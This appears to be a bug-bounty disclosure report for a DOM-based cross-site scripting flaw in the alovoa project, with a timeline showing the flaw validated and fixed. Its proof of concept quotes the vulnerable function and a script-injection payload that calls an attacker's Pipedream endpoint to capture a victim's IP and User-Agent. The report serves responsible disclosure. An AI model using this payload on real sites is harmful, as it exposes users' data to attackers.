Cross-site Scripting (XSS) - DOM in alovoa/alovoa


Reported on

Jul 19th 2021

✍️ Description

It is possible to run JavaScript code in the webpage by DOM unsanitized properties. The function onChangeLocal sets the value of directly from the URL, without previous checks.

🕵️‍♂️ Proof of Concept

// Vulnerable function in file fragments.html:139
function onChangeLocal(e) {
let val = e.options[e.selectedIndex].value;
console.log(val); = val;

A quick example can be done obtaining IP and User-Agent info from a victim: The attacker sets a webserver. For poc purposes, a Pipedream URL was used:

The attacker also sends the following link to the victim:"><script>fetch("")</script>

So the val will be set with the malicious payload.

When the victim opens the link, the attacker gets the IP and User-Agent.


💥 Impact

This could be useful for an attacker to make users execute a malicious link and then get personal information or do other malicious actions.


Ileana Barrionuevo modified the report
2 years ago
We have contacted a member of the alovoa team and are waiting to hear back 2 years ago
Nho Quy Dinh validated this vulnerability 2 years ago
Ileana Barrionuevo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nho Quy Dinh marked this as fixed with commit 01ae69 2 years ago
Nho Quy Dinh has been awarded the fix bounty
This vulnerability will not receive a CVE
2 years ago

dear Ileana Barrionuevo , I don't like to find bug on repositories that already someone working on it, so if you let me I work on Alovoa, your friend, Amammad.

2 years ago


Hi Amammad, I don't have any problem :) Four eyes see better than two ones. :D

to join this conversation